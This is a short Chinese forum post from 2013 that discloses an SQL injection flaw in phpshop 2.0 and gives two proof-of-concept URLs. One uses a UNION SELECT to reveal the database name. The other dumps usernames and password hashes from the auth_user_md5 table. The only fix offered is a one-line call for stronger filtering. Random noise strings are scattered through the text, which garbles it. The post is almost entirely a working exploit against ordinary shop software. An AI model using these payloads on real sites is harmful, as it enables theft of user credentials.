标题 : phpshop 2.0 SQL Injection Vulnerability3 q. V/ u" G. O% |) V9 a
* D% B, p, \8 ?+ Q2 |1 W+ v
作者 : By onestree' i5 |, ~+ @+ H7 m, o
下载地址 : http://code.google.com/p/phpshop/downloads/list3 h3 k4 @9 z$ M5 C1 y+ N
测试地址: windows 7 / ubuntu
( X1 c" o- z8 N2 D
3 w4 F( ]0 v, C* \$ R
0 M7 @* ]. d: U8 `SQLi p0c:! Q; `0 B& c, k
, I4 T5 S# d" C1 R
==================
$ i U S+ @; }" J+ r
4 S& H* m) { a4 jhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'5 e1 h& k4 i3 Q9 S8 h
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
9 Y4 s/ G! }7 C6 t 9 R9 O! ~$ x$ l
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
- W5 i& l: T z3 W9 q) c7 Z* @: y
% o% o+ K3 v" |1 C* \8 }; h: t修复:
2 ^; [9 n& h' N+ a2 X. d/ K加强过滤
+ P2 x; \7 o: j) i
; F3 j. z, c1 I ]7 x* L2 R* T5 S: V# K0 {) T
|
发表于 2013-1-18 18:24:10
收藏
支持
反对